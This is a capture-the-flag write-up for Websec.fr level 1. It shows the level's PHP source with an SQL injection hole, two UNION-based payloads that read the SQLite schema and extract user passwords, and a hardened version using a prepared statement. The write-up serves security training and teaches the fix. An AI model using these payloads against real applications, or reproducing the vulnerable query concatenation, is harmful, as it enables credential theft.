Websec.fr level 1 - baby steps
The level
source code:
<?php
session_start ();
ini_set('display_errors', 'on');
ini_set('error_reporting', E_ALL);
include 'anti_csrf.php';
init_token ();
class LevelOne {
public function doQuery($injection) {
$pdo = new SQLite3('database.db', SQLITE3_OPEN_READONLY);
// user input is concatenated straight into the SQL string, no quoting or binding
$query = 'SELECT id,username FROM users WHERE id=' . $injection . ' LIMIT 1';
$getUsers = $pdo->query($query);
$users = $getUsers->fetchArray(SQLITE3_ASSOC);
if ($users) {
return $users;
}
return false;
}
}
if (isset ($_POST['submit']) && isset ($_POST['user_id'])) {
check_and_refresh_token();
$lo = new LevelOne ();
$userDetails = $lo->doQuery ($_POST['user_id']);
}
?>
So we can see that the query
$query = 'SELECT id,username FROM users WHERE id=' . $injection . ' LIMIT 1';
selects id, username from users where id is whatever we send in user_id, with no escaping or binding at all. Great!
We want to UNION another query that returns the password, or anything else that can give us the flag. First let's check the SQL schema from sqlite_master:
1 UNION SELECT 1,sql FROM sqlite_master
(Remember, the UNION query has to return the same number of columns as the first query.)
Look! We have a password field; let's try to get that:
1 UNION SELECT id, password FROM users WHERE id=1
So the complete SQL query becomes
SELECT id, username FROM users WHERE id=1
UNION
SELECT id, password FROM users WHERE id=1 LIMIT 1;
Got it! Thanks for reading.
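For comparison, here is how the level's doQuery() would look with the injection closed. This is an added example, not the level's own code; it assumes the same database.db, the same users(id, username, password) table and the check_and_refresh_token() helper from anti_csrf.php.

```php
<?php
// Added example: hardened version of the level's doQuery(). Assumes the same
// database.db and users table as the level, and anti_csrf.php for the token check.
include 'anti_csrf.php';

class LevelOneFixed {
    public function doQuery(string $userId) {
        // id is a numeric column, so anything that is not a plain integer is rejected
        // before it reaches the database. "1 UNION SELECT ..." never gets this far.
        if (!preg_match('/^\d+$/', $userId)) {
            return false;
        }
        $db = new SQLite3('database.db', SQLITE3_OPEN_READONLY);
        // A prepared statement fixes the query structure up front; the bound value is
        // passed to SQLite as data and cannot change the SQL, whatever it contains.
        $stmt = $db->prepare('SELECT id, username FROM users WHERE id = :id LIMIT 1');
        $stmt->bindValue(':id', (int) $userId, SQLITE3_INTEGER);
        $result = $stmt->execute();
        $row = $result->fetchArray(SQLITE3_ASSOC);
        $result->finalize();
        $stmt->close();
        $db->close();
        // Same contract as the original: the row on success, false otherwise.
        return $row ?: false;
    }
}

// Handler mirroring the level's own form processing.
if (isset($_POST['submit'], $_POST['user_id'])) {
    check_and_refresh_token();
    $lo = new LevelOneFixed();
    $userDetails = $lo->doQuery((string) $_POST['user_id']);
}
?>
```

With this version the sqlite_master and password payloads above fail the integer check, and even a value that slipped past it would only ever be compared against id, never parsed as SQL.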
This post is licensed under CC BY 4.0 by the author.